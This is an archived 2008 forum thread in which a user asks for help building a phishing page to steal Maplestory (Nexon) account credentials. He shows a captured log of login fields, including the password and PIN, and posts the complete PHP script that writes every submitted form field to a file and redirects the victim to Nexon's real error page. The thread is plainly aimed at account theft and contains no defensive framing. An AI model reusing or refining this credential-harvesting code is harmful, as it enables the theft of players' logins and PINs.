Ezud.com - Trolling Assistance Forum

Ezud.com - Trolling Assistance Forum (http://ezud.com/forum/index.php)
-   General Stuff (http://ezud.com/forum/forumdisplay.php?f=186)
-   -   I need help making this phisher work. (http://ezud.com/forum/showthread.php?t=2075)

Sanjuro 10-13-2008 03:33 PM

Working on my Phisher, need help.
 
So I looked at Jared's Maplestory phishing log, and decided I want a phisher.

NEW ISSUE: I want it to come back in simpler terms then what is in the codebox below.

Link removed because its not needed no more. :D

That is what I have so far.
I don't really know how to write with .php.
So I need your help.

On the return of the log I get this.

Code:

#
__EVENTTARGET=
#
__EVENTARGUMENT=
#
__EVENTFUCK=
#
__VIEWSTATE=/wEPDwUKLTkyNDk3MTM1Mw9kFgICAg9kFgICAQ9kFgJmD2QWAgIDDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUXL01vZHVsZXMvTG9naW4kYnRuTG9naW4=
#
/Modules/Login$txtId=2222
#
/Modules/Login$btnLogin_x=23
#
/Modules/Login$btnLogin_y=24
#
/Modules/Login$txtPassword=2222
#
/Modules/Login$txtPin=2222

Yeah, it says EVENTFUCK=. That is where it reads the Pin.

Lust 10-13-2008 05:48 PM

I have no idea what any of that means.

Post the logging file.

Sanjuro 10-13-2008 06:00 PM

Code:

<?php
header("location: http://www.nexon.net/errorPage.html");
$handle = fopen("filenamehere. :D", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You mean that?


All times are GMT -8. The time now is 01:29 PM.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.